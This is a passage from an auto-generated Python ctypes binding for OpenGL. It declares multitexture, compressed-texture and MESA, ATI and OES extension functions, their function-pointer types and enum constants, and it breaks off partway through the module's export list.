glGetCompressedTexImage = _link_function('glGetCompressedTexImage', None, [GLenum, GLint, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1871
glMultiTexCoord1d = _link_function('glMultiTexCoord1d', None, [GLenum, GLdouble], None)
# /usr/include/GL/gl.h:1873
glMultiTexCoord1dv = _link_function('glMultiTexCoord1dv', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1875
glMultiTexCoord1f = _link_function('glMultiTexCoord1f', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1877
glMultiTexCoord1fv = _link_function('glMultiTexCoord1fv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1879
glMultiTexCoord1i = _link_function('glMultiTexCoord1i', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1881
glMultiTexCoord1iv = _link_function('glMultiTexCoord1iv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1883
glMultiTexCoord1s = _link_function('glMultiTexCoord1s', None, [GLenum, GLshort], None)
# /usr/include/GL/gl.h:1885
glMultiTexCoord1sv = _link_function('glMultiTexCoord1sv', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1887
glMultiTexCoord2d = _link_function('glMultiTexCoord2d', None, [GLenum, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1889
glMultiTexCoord2dv = _link_function('glMultiTexCoord2dv', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1891
glMultiTexCoord2f = _link_function('glMultiTexCoord2f', None, [GLenum, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1893
glMultiTexCoord2fv = _link_function('glMultiTexCoord2fv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1895
glMultiTexCoord2i = _link_function('glMultiTexCoord2i', None, [GLenum, GLint, GLint], None)
# /usr/include/GL/gl.h:1897
glMultiTexCoord2iv = _link_function('glMultiTexCoord2iv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1899
glMultiTexCoord2s = _link_function('glMultiTexCoord2s', None, [GLenum, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1901
glMultiTexCoord2sv = _link_function('glMultiTexCoord2sv', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1903
glMultiTexCoord3d = _link_function('glMultiTexCoord3d', None, [GLenum, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1905
glMultiTexCoord3dv = _link_function('glMultiTexCoord3dv', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1907
glMultiTexCoord3f = _link_function('glMultiTexCoord3f', None, [GLenum, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1909
glMultiTexCoord3fv = _link_function('glMultiTexCoord3fv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1911
glMultiTexCoord3i = _link_function('glMultiTexCoord3i', None, [GLenum, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1913
glMultiTexCoord3iv = _link_function('glMultiTexCoord3iv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1915
glMultiTexCoord3s = _link_function('glMultiTexCoord3s', None, [GLenum, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1917
glMultiTexCoord3sv = _link_function('glMultiTexCoord3sv', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1919
glMultiTexCoord4d = _link_function('glMultiTexCoord4d', None, [GLenum, GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1921
glMultiTexCoord4dv = _link_function('glMultiTexCoord4dv', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1923
glMultiTexCoord4f = _link_function('glMultiTexCoord4f', None, [GLenum, GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1925
glMultiTexCoord4fv = _link_function('glMultiTexCoord4fv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1927
glMultiTexCoord4i = _link_function('glMultiTexCoord4i', None, [GLenum, GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1929
glMultiTexCoord4iv = _link_function('glMultiTexCoord4iv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1931
glMultiTexCoord4s = _link_function('glMultiTexCoord4s', None, [GLenum, GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1933
glMultiTexCoord4sv = _link_function('glMultiTexCoord4sv', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1936
glLoadTransposeMatrixd = _link_function('glLoadTransposeMatrixd', None, [GLdouble * 16], None)
# /usr/include/GL/gl.h:1938
glLoadTransposeMatrixf = _link_function('glLoadTransposeMatrixf', None, [GLfloat * 16], None)
# /usr/include/GL/gl.h:1940
glMultTransposeMatrixd = _link_function('glMultTransposeMatrixd', None, [GLdouble * 16], None)
# /usr/include/GL/gl.h:1942
glMultTransposeMatrixf = _link_function('glMultTransposeMatrixf', None, [GLfloat * 16], None)
# /usr/include/GL/gl.h:1944
glSampleCoverage = _link_function('glSampleCoverage', None, [GLclampf, GLboolean], None)
PFNGLACTIVETEXTUREPROC = CFUNCTYPE(None, GLenum) # /usr/include/GL/gl.h:1947
PFNGLSAMPLECOVERAGEPROC = CFUNCTYPE(None, GLclampf, GLboolean) # /usr/include/GL/gl.h:1948
PFNGLCOMPRESSEDTEXIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLenum, GLsizei, GLsizei, GLsizei, GLint, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1949
PFNGLCOMPRESSEDTEXIMAGE2DPROC = CFUNCTYPE(None, GLenum, GLint, GLenum, GLsizei, GLsizei, GLint, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1950
PFNGLCOMPRESSEDTEXIMAGE1DPROC = CFUNCTYPE(None, GLenum, GLint, GLenum, GLsizei, GLint, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1951
PFNGLCOMPRESSEDTEXSUBIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLint, GLsizei, GLsizei, GLsizei, GLenum, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1952
PFNGLCOMPRESSEDTEXSUBIMAGE2DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLsizei, GLsizei, GLenum, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1953
PFNGLCOMPRESSEDTEXSUBIMAGE1DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLsizei, GLenum, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1954
PFNGLGETCOMPRESSEDTEXIMAGEPROC = CFUNCTYPE(None, GLenum, GLint, POINTER(GLvoid)) # /usr/include/GL/gl.h:1955
GL_ARB_multitexture = 1 # /usr/include/GL/gl.h:1963
GL_TEXTURE0_ARB = 33984 # /usr/include/GL/gl.h:1965
GL_TEXTURE1_ARB = 33985 # /usr/include/GL/gl.h:1966
GL_TEXTURE2_ARB = 33986 # /usr/include/GL/gl.h:1967
GL_TEXTURE3_ARB = 33987 # /usr/include/GL/gl.h:1968
GL_TEXTURE4_ARB = 33988 # /usr/include/GL/gl.h:1969
GL_TEXTURE5_ARB = 33989 # /usr/include/GL/gl.h:1970
GL_TEXTURE6_ARB = 33990 # /usr/include/GL/gl.h:1971
GL_TEXTURE7_ARB = 33991 # /usr/include/GL/gl.h:1972
GL_TEXTURE8_ARB = 33992 # /usr/include/GL/gl.h:1973
GL_TEXTURE9_ARB = 33993 # /usr/include/GL/gl.h:1974
GL_TEXTURE10_ARB = 33994 # /usr/include/GL/gl.h:1975
GL_TEXTURE11_ARB = 33995 # /usr/include/GL/gl.h:1976
GL_TEXTURE12_ARB = 33996 # /usr/include/GL/gl.h:1977
GL_TEXTURE13_ARB = 33997 # /usr/include/GL/gl.h:1978
GL_TEXTURE14_ARB = 33998 # /usr/include/GL/gl.h:1979
GL_TEXTURE15_ARB = 33999 # /usr/include/GL/gl.h:1980
GL_TEXTURE16_ARB = 34000 # /usr/include/GL/gl.h:1981
GL_TEXTURE17_ARB = 34001 # /usr/include/GL/gl.h:1982
GL_TEXTURE18_ARB = 34002 # /usr/include/GL/gl.h:1983
GL_TEXTURE19_ARB = 34003 # /usr/include/GL/gl.h:1984
GL_TEXTURE20_ARB = 34004 # /usr/include/GL/gl.h:1985
GL_TEXTURE21_ARB = 34005 # /usr/include/GL/gl.h:1986
GL_TEXTURE22_ARB = 34006 # /usr/include/GL/gl.h:1987
GL_TEXTURE23_ARB = 34007 # /usr/include/GL/gl.h:1988
GL_TEXTURE24_ARB = 34008 # /usr/include/GL/gl.h:1989
GL_TEXTURE25_ARB = 34009 # /usr/include/GL/gl.h:1990
GL_TEXTURE26_ARB = 34010 # /usr/include/GL/gl.h:1991
GL_TEXTURE27_ARB = 34011 # /usr/include/GL/gl.h:1992
GL_TEXTURE28_ARB = 34012 # /usr/include/GL/gl.h:1993
GL_TEXTURE29_ARB = 34013 # /usr/include/GL/gl.h:1994
GL_TEXTURE30_ARB = 34014 # /usr/include/GL/gl.h:1995
GL_TEXTURE31_ARB = 34015 # /usr/include/GL/gl.h:1996
GL_ACTIVE_TEXTURE_ARB = 34016 # /usr/include/GL/gl.h:1997
GL_CLIENT_ACTIVE_TEXTURE_ARB = 34017 # /usr/include/GL/gl.h:1998
GL_MAX_TEXTURE_UNITS_ARB = 34018 # /usr/include/GL/gl.h:1999
# /usr/include/GL/gl.h:2001
glActiveTextureARB = _link_function('glActiveTextureARB', None, [GLenum], None)
# /usr/include/GL/gl.h:2002
glClientActiveTextureARB = _link_function('glClientActiveTextureARB', None, [GLenum], None)
# /usr/include/GL/gl.h:2003
glMultiTexCoord1dARB = _link_function('glMultiTexCoord1dARB', None, [GLenum, GLdouble], None)
# /usr/include/GL/gl.h:2004
glMultiTexCoord1dvARB = _link_function('glMultiTexCoord1dvARB', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:2005
glMultiTexCoord1fARB = _link_function('glMultiTexCoord1fARB', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:2006
glMultiTexCoord1fvARB = _link_function('glMultiTexCoord1fvARB', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:2007
glMultiTexCoord1iARB = _link_function('glMultiTexCoord1iARB', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:2008
glMultiTexCoord1ivARB = _link_function('glMultiTexCoord1ivARB', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:2009
glMultiTexCoord1sARB = _link_function('glMultiTexCoord1sARB', None, [GLenum, GLshort], None)
# /usr/include/GL/gl.h:2010
glMultiTexCoord1svARB = _link_function('glMultiTexCoord1svARB', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:2011
glMultiTexCoord2dARB = _link_function('glMultiTexCoord2dARB', None, [GLenum, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:2012
glMultiTexCoord2dvARB = _link_function('glMultiTexCoord2dvARB', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:2013
glMultiTexCoord2fARB = _link_function('glMultiTexCoord2fARB', None, [GLenum, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:2014
glMultiTexCoord2fvARB = _link_function('glMultiTexCoord2fvARB', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:2015
glMultiTexCoord2iARB = _link_function('glMultiTexCoord2iARB', None, [GLenum, GLint, GLint], None)
# /usr/include/GL/gl.h:2016
glMultiTexCoord2ivARB = _link_function('glMultiTexCoord2ivARB', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:2017
glMultiTexCoord2sARB = _link_function('glMultiTexCoord2sARB', None, [GLenum, GLshort, GLshort], None)
# /usr/include/GL/gl.h:2018
glMultiTexCoord2svARB = _link_function('glMultiTexCoord2svARB', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:2019
glMultiTexCoord3dARB = _link_function('glMultiTexCoord3dARB', None, [GLenum, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:2020
glMultiTexCoord3dvARB = _link_function('glMultiTexCoord3dvARB', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:2021
glMultiTexCoord3fARB = _link_function('glMultiTexCoord3fARB', None, [GLenum, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:2022
glMultiTexCoord3fvARB = _link_function('glMultiTexCoord3fvARB', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:2023
glMultiTexCoord3iARB = _link_function('glMultiTexCoord3iARB', None, [GLenum, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:2024
glMultiTexCoord3ivARB = _link_function('glMultiTexCoord3ivARB', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:2025
glMultiTexCoord3sARB = _link_function('glMultiTexCoord3sARB', None, [GLenum, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:2026
glMultiTexCoord3svARB = _link_function('glMultiTexCoord3svARB', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:2027
glMultiTexCoord4dARB = _link_function('glMultiTexCoord4dARB', None, [GLenum, GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:2028
glMultiTexCoord4dvARB = _link_function('glMultiTexCoord4dvARB', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:2029
glMultiTexCoord4fARB = _link_function('glMultiTexCoord4fARB', None, [GLenum, GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:2030
glMultiTexCoord4fvARB = _link_function('glMultiTexCoord4fvARB', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:2031
glMultiTexCoord4iARB = _link_function('glMultiTexCoord4iARB', None, [GLenum, GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:2032
glMultiTexCoord4ivARB = _link_function('glMultiTexCoord4ivARB', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:2033
glMultiTexCoord4sARB = _link_function('glMultiTexCoord4sARB', None, [GLenum, GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:2034
glMultiTexCoord4svARB = _link_function('glMultiTexCoord4svARB', None, [GLenum, POINTER(GLshort)], None)
PFNGLACTIVETEXTUREARBPROC = CFUNCTYPE(None, GLenum) # /usr/include/GL/gl.h:2036
PFNGLCLIENTACTIVETEXTUREARBPROC = CFUNCTYPE(None, GLenum) # /usr/include/GL/gl.h:2037
PFNGLMULTITEXCOORD1DARBPROC = CFUNCTYPE(None, GLenum, GLdouble) # /usr/include/GL/gl.h:2038
PFNGLMULTITEXCOORD1DVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLdouble)) # /usr/include/GL/gl.h:2039
PFNGLMULTITEXCOORD1FARBPROC = CFUNCTYPE(None, GLenum, GLfloat) # /usr/include/GL/gl.h:2040
PFNGLMULTITEXCOORD1FVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLfloat)) # /usr/include/GL/gl.h:2041
PFNGLMULTITEXCOORD1IARBPROC = CFUNCTYPE(None, GLenum, GLint) # /usr/include/GL/gl.h:2042
PFNGLMULTITEXCOORD1IVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLint)) # /usr/include/GL/gl.h:2043
PFNGLMULTITEXCOORD1SARBPROC = CFUNCTYPE(None, GLenum, GLshort) # /usr/include/GL/gl.h:2044
PFNGLMULTITEXCOORD1SVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLshort)) # /usr/include/GL/gl.h:2045
PFNGLMULTITEXCOORD2DARBPROC = CFUNCTYPE(None, GLenum, GLdouble, GLdouble) # /usr/include/GL/gl.h:2046
PFNGLMULTITEXCOORD2DVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLdouble)) # /usr/include/GL/gl.h:2047
PFNGLMULTITEXCOORD2FARBPROC = CFUNCTYPE(None, GLenum, GLfloat, GLfloat) # /usr/include/GL/gl.h:2048
PFNGLMULTITEXCOORD2FVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLfloat)) # /usr/include/GL/gl.h:2049
PFNGLMULTITEXCOORD2IARBPROC = CFUNCTYPE(None, GLenum, GLint, GLint) # /usr/include/GL/gl.h:2050
PFNGLMULTITEXCOORD2IVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLint)) # /usr/include/GL/gl.h:2051
PFNGLMULTITEXCOORD2SARBPROC = CFUNCTYPE(None, GLenum, GLshort, GLshort) # /usr/include/GL/gl.h:2052
PFNGLMULTITEXCOORD2SVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLshort)) # /usr/include/GL/gl.h:2053
PFNGLMULTITEXCOORD3DARBPROC = CFUNCTYPE(None, GLenum, GLdouble, GLdouble, GLdouble) # /usr/include/GL/gl.h:2054
PFNGLMULTITEXCOORD3DVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLdouble)) # /usr/include/GL/gl.h:2055
PFNGLMULTITEXCOORD3FARBPROC = CFUNCTYPE(None, GLenum, GLfloat, GLfloat, GLfloat) # /usr/include/GL/gl.h:2056
PFNGLMULTITEXCOORD3FVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLfloat)) # /usr/include/GL/gl.h:2057
PFNGLMULTITEXCOORD3IARBPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint) # /usr/include/GL/gl.h:2058
PFNGLMULTITEXCOORD3IVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLint)) # /usr/include/GL/gl.h:2059
PFNGLMULTITEXCOORD3SARBPROC = CFUNCTYPE(None, GLenum, GLshort, GLshort, GLshort) # /usr/include/GL/gl.h:2060
PFNGLMULTITEXCOORD3SVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLshort)) # /usr/include/GL/gl.h:2061
PFNGLMULTITEXCOORD4DARBPROC = CFUNCTYPE(None, GLenum, GLdouble, GLdouble, GLdouble, GLdouble) # /usr/include/GL/gl.h:2062
PFNGLMULTITEXCOORD4DVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLdouble)) # /usr/include/GL/gl.h:2063
PFNGLMULTITEXCOORD4FARBPROC = CFUNCTYPE(None, GLenum, GLfloat, GLfloat, GLfloat, GLfloat) # /usr/include/GL/gl.h:2064
PFNGLMULTITEXCOORD4FVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLfloat)) # /usr/include/GL/gl.h:2065
PFNGLMULTITEXCOORD4IARBPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLint) # /usr/include/GL/gl.h:2066
PFNGLMULTITEXCOORD4IVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLint)) # /usr/include/GL/gl.h:2067
PFNGLMULTITEXCOORD4SARBPROC = CFUNCTYPE(None, GLenum, GLshort, GLshort, GLshort, GLshort) # /usr/include/GL/gl.h:2068
PFNGLMULTITEXCOORD4SVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLshort)) # /usr/include/GL/gl.h:2069
GL_MESA_shader_debug = 1 # /usr/include/GL/gl.h:2094
GL_DEBUG_OBJECT_MESA = 34649 # /usr/include/GL/gl.h:2096
GL_DEBUG_PRINT_MESA = 34650 # /usr/include/GL/gl.h:2097
GL_DEBUG_ASSERT_MESA = 34651 # /usr/include/GL/gl.h:2098
GLhandleARB = c_uint # /usr/include/GL/glext.h:5340
# /usr/include/GL/gl.h:2100
glCreateDebugObjectMESA = _link_function('glCreateDebugObjectMESA', GLhandleARB, [], None)
# /usr/include/GL/gl.h:2101
glClearDebugLogMESA = _link_function('glClearDebugLogMESA', None, [GLhandleARB, GLenum, GLenum], None)
GLcharARB = c_char # /usr/include/GL/glext.h:5339
# /usr/include/GL/gl.h:2102
glGetDebugLogMESA = _link_function('glGetDebugLogMESA', None, [GLhandleARB, GLenum, GLenum, GLsizei, POINTER(GLsizei), POINTER(GLcharARB)], None)
# /usr/include/GL/gl.h:2104
glGetDebugLogLengthMESA = _link_function('glGetDebugLogLengthMESA', GLsizei, [GLhandleARB, GLenum, GLenum], None)
GL_MESA_packed_depth_stencil = 1 # /usr/include/GL/gl.h:2116
GL_DEPTH_STENCIL_MESA = 34640 # /usr/include/GL/gl.h:2118
GL_UNSIGNED_INT_24_8_MESA = 34641 # /usr/include/GL/gl.h:2119
GL_UNSIGNED_INT_8_24_REV_MESA = 34642 # /usr/include/GL/gl.h:2120
GL_UNSIGNED_SHORT_15_1_MESA = 34643 # /usr/include/GL/gl.h:2121
GL_UNSIGNED_SHORT_1_15_REV_MESA = 34644 # /usr/include/GL/gl.h:2122
GL_MESA_program_debug = 1 # /usr/include/GL/gl.h:2128
GL_FRAGMENT_PROGRAM_POSITION_MESA = 35760 # /usr/include/GL/gl.h:2130
GL_FRAGMENT_PROGRAM_CALLBACK_MESA = 35761 # /usr/include/GL/gl.h:2131
GL_FRAGMENT_PROGRAM_CALLBACK_FUNC_MESA = 35762 # /usr/include/GL/gl.h:2132
GL_FRAGMENT_PROGRAM_CALLBACK_DATA_MESA = 35763 # /usr/include/GL/gl.h:2133
GL_VERTEX_PROGRAM_POSITION_MESA = 35764 # /usr/include/GL/gl.h:2134
GL_VERTEX_PROGRAM_CALLBACK_MESA = 35765 # /usr/include/GL/gl.h:2135
GL_VERTEX_PROGRAM_CALLBACK_FUNC_MESA = 35766 # /usr/include/GL/gl.h:2136
GL_VERTEX_PROGRAM_CALLBACK_DATA_MESA = 35767 # /usr/include/GL/gl.h:2137
GLprogramcallbackMESA = CFUNCTYPE(None, GLenum, POINTER(GLvoid)) # /usr/include/GL/gl.h:2139
# /usr/include/GL/gl.h:2141
glProgramCallbackMESA = _link_function('glProgramCallbackMESA', None, [GLenum, GLprogramcallbackMESA, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:2143
glGetProgramRegisterfvMESA = _link_function('glGetProgramRegisterfvMESA', None, [GLenum, GLsizei, POINTER(GLubyte), POINTER(GLfloat)], None)
GL_MESA_texture_array = 1 # /usr/include/GL/gl.h:2149
GL_ATI_blend_equation_separate = 1 # /usr/include/GL/gl.h:2182
GL_ALPHA_BLEND_EQUATION_ATI = 34877 # /usr/include/GL/gl.h:2184
# /usr/include/GL/gl.h:2186
glBlendEquationSeparateATI = _link_function('glBlendEquationSeparateATI', None, [GLenum, GLenum], None)
PFNGLBLENDEQUATIONSEPARATEATIPROC = CFUNCTYPE(None, GLenum, GLenum) # /usr/include/GL/gl.h:2187
GLeglImageOES = POINTER(None) # /usr/include/GL/gl.h:2194
GL_OES_EGL_image = 1 # /usr/include/GL/gl.h:2198
PFNGLEGLIMAGETARGETTEXTURE2DOESPROC = CFUNCTYPE(None, GLenum, GLeglImageOES) # /usr/include/GL/gl.h:2203
PFNGLEGLIMAGETARGETRENDERBUFFERSTORAGEOESPROC = CFUNCTYPE(None, GLenum, GLeglImageOES) # /usr/include/GL/gl.h:2204
__all__ = ['GL_VERSION_1_1', 'GL_VERSION_1_2', 'GL_VERSION_1_3',
'GL_ARB_imaging', 'GLenum', 'GLboolean', 'GLbitfield', 'GLvoid', 'GLbyte',
'GLshort', 'GLint', 'GLubyte', 'GLushort', 'GLuint', 'GLsizei', 'GLfloat',
'GLclampf', 'GLdouble', 'GLclampd', 'GL_FALSE', 'GL_TRUE', 'GL_BYTE',
'GL_UNSIGNED_BYTE', 'GL_SHORT', 'GL_UNSIGNED_SHORT', 'GL_INT',
'GL_UNSIGNED_INT', 'GL_FLOAT', 'GL_2_BYTES', 'GL_3_BYTES', 'GL_4_BYTES',
'GL_DOUBLE', 'GL_POINTS', 'GL_LINES', 'GL_LINE_LOOP', 'GL_LINE_STRIP',
'GL_TRIANGLES', 'GL_TRIANGLE_STRIP', 'GL_TRIANGLE_FAN', 'GL_QUADS',
'GL_QUAD_STRIP', 'GL_POLYGON', 'GL_VERTEX_ARRAY', 'GL_NORMAL_ARRAY',
'GL_COLOR_ARRAY', 'GL_INDEX_ARRAY', 'GL_TEXTURE_COORD_ARRAY',
'GL_EDGE_FLAG_ARRAY', 'GL_VERTEX_ARRAY_SIZE', 'GL_VERTEX_ARRAY_TYPE',
'GL_VERTEX_ARRAY_STRIDE', 'GL_NORMAL_ARRAY_TYPE', 'GL_NORMAL_ARRAY_STRIDE',
'GL_COLOR_ARRAY_SIZE', 'GL_COLOR_ARRAY_TYPE', 'GL_COLOR_ARRAY_STRIDE',
'GL_INDEX_ARRAY_TYPE', 'GL_INDEX_ARRAY_STRIDE', 'GL_TEXTURE_COORD_ARRAY_SIZE',
'GL_TEXTURE_COORD_ARRAY_TYPE', 'GL_TEXTURE_COORD_ARRAY_STRIDE',
'GL_EDGE_FLAG_ARRAY_STRIDE', 'GL_VERTEX_ARRAY_POINTER',
'GL_NORMAL_ARRAY_POINTER', 'GL_COLOR_ARRAY_POINTER', 'GL_INDEX_ARRAY_POINTER',
'GL_TEXTURE_COORD_ARRAY_POINTER', 'GL_EDGE_FLAG_ARRAY_POINTER', 'GL_V2F',
'GL_V3F', 'GL_C4UB_V2F', 'GL_C4UB_V3F', 'GL_C3F_V3F', 'GL_N3F_V3F',
'GL_C4F_N3F_V3F', 'GL_T2F_V3F', 'GL_T4F_V4F', 'GL_T2F_C4UB_V3F',
'GL_T2F_C3F_V3F', 'GL_T2F_N3F_V3F', 'GL_T2F_C4F_N3F_V3F',
'GL_T4F_C4F_N3F_V4F', 'GL_MATRIX_MODE', 'GL_MODELVIEW', 'GL_PROJECTION',
'GL_TEXTURE', 'GL_POINT_SMOOTH', 'GL_POINT_SIZE', 'GL_POINT_SIZE_GRANULARITY',
'GL_POINT_SIZE_RANGE', 'GL_LINE_SMOOTH', 'GL_LINE_STIPPLE',
'GL_LINE_STIPPLE_PATTERN', 'GL_LINE_STIPPLE_REPEAT', 'GL_LINE_WIDTH',
'GL_LINE_WIDTH_GRANULARITY', 'GL_LINE_WIDTH_RANGE', 'GL_POINT', 'GL_LINE',
'GL_FILL', 'GL_CW', 'GL_CCW', 'GL_FRONT', 'GL_BACK', 'GL_POLYGON_MODE',
'GL_POLYGON_SMOOTH', 'GL_POLYGON_STIPPLE', 'GL_EDGE_FLAG', 'GL_CULL_FACE',
'GL_CULL_FACE_MODE', 'GL_FRONT_FACE', 'GL_POLYGON_OFFSET_FACTOR',
'GL_POLYGON_OFFSET_UNITS', 'GL_POLYGON_OFFSET_POINT',
'GL_POLYGON_OFFSET_LINE', 'GL_POLYGON_OFFSET_FILL', 'GL_COMPILE',
'GL_COMPILE_AND_EXECUTE', 'GL_LIST_BASE', 'GL_LIST_INDEX', 'GL_LIST_MODE',
'GL_NEVER', 'GL_LESS', 'GL_EQUAL', 'GL_LEQUAL', 'GL_GREATER', 'GL_NOTEQUAL',
'GL_GEQUAL', 'GL_ALWAYS', 'GL_DEPTH_TEST', 'GL_DEPTH_BITS',
'GL_DEPTH_CLEAR_VALUE', 'GL_DEPTH_FUNC', 'GL_DEPTH_RANGE',
'GL_DEPTH_WRITEMASK', 'GL_DEPTH_COMPONENT', 'GL_LIGHTING', 'GL_LIGHT0',
'GL_LIGHT1', 'GL_LIGHT2', 'GL_LIGHT3', 'GL_LIGHT4', 'GL_LIGHT5', 'GL_LIGHT6',
'GL_LIGHT7', 'GL_SPOT_EXPONENT', 'GL_SPOT_CUTOFF', 'GL_CONSTANT_ATTENUATION',
'GL_LINEAR_ATTENUATION', 'GL_QUADRATIC_ATTENUATION', 'GL_AMBIENT',
'GL_DIFFUSE', 'GL_SPECULAR', 'GL_SHININESS', 'GL_EMISSION', 'GL_POSITION',
'GL_SPOT_DIRECTION', 'GL_AMBIENT_AND_DIFFUSE', 'GL_COLOR_INDEXES',
'GL_LIGHT_MODEL_TWO_SIDE', 'GL_LIGHT_MODEL_LOCAL_VIEWER',
'GL_LIGHT_MODEL_AMBIENT', 'GL_FRONT_AND_BACK', 'GL_SHADE_MODEL', 'GL_FLAT',
'GL_SMOOTH', 'GL_COLOR_MATERIAL', 'GL_COLOR_MATERIAL_FACE',
'GL_COLOR_MATERIAL_PARAMETER', 'GL_NORMALIZE', 'GL_CLIP_PLANE0',
'GL_CLIP_PLANE1', 'GL_CLIP_PLANE2', 'GL_CLIP_PLANE3', 'GL_CLIP_PLANE4',
'GL_CLIP_PLANE5', 'GL_ACCUM_RED_BITS', 'GL_ACCUM_GREEN_BITS',
'GL_ACCUM_BLUE_BITS', 'GL_ACCUM_ALPHA_BITS', 'GL_ACCUM_CLEAR_VALUE',
'GL_ACCUM', 'GL_ADD', 'GL_LOAD', 'GL_MULT', 'GL_RETURN', 'GL_ALPHA_TEST',
'GL_ALPHA_TEST_REF', 'GL_ALPHA_TEST_FUNC', 'GL_BLEND', 'GL_BLEND_SRC',
'GL_BLEND_DST', 'GL_ZERO', 'GL_ONE', 'GL_SRC_COLOR', 'GL_ONE_MINUS_SRC_COLOR',
'GL_SRC_ALPHA', 'GL_ONE_MINUS_SRC_ALPHA', 'GL_DST_ALPHA',
'GL_ONE_MINUS_DST_ALPHA', 'GL_DST_COLOR', 'GL_ONE_MINUS_DST_COLOR',
'GL_SRC_ALPHA_SATURATE', 'GL_FEEDBACK', 'GL_RENDER', 'GL_SELECT', 'GL_2D',
'GL_3D', 'GL_3D_COLOR', 'GL_3D_COLOR_TEXTURE', 'GL_4D_COLOR_TEXTURE',
'GL_POINT_TOKEN', 'GL_LINE_TOKEN', 'GL_LINE_RESET_TOKEN', 'GL_POLYGON_TOKEN',
